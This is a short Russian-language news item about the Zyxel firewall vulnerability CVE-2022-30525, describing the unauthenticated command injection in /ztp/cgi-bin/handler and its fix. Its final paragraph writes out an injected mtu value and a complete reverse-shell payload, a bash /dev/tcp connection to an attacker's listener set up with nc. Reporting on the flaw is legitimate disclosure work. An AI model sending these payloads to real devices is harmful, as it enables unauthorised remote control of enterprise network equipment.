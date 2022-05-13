В устройствах Zyxel серий ATP, VPN и USG FLEX, предназначенных для организации работы межсетевых экранов, IDS и VPN на предприятиях, выявлена критическая уязвимость (CVE-2022-30525), позволяющая внешнему атакующему без аутентификации выполнить код на устройстве с правами пользователя nobody. Для совершения атаки злоумышленник должен иметь возможность отправки на устройство запросов по протоколу HTTP/HTTPS. Компания Zyxel устранила уязвимость в обновлении прошивки ZLD 5.30. По данным сервиса Shodan в настоящее время в глобальной сети зафиксировано 16213 потенциально уязвимых устройств, принимающих запросы по HTTP/HTTPS.

Эксплуатация производится через отправку специально оформленных команд к web-обработчику /ztp/cgi-bin/handler, доступному без аутентификации. Проблема вызвана отсутствием должной чистки параметров запроса при выполнении в системе команд при помощи вызова os.system, используемого в библиотеке lib_wan_settings.py и выполняемого при обработке операции setWanPortSt.

Например, атакующий может передать в поле mtu строку "; ping 192.168.1.210;" которая приведёт к выполнению в системе команды "ping 192.168.1.210". Для получения доступа к командной оболочке можно запустить на своей системе "nc -lvnp 1270", после чего инициировать обратное соединение (reverse shell) отправив на устройство запрос с параметром '; bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\";'.



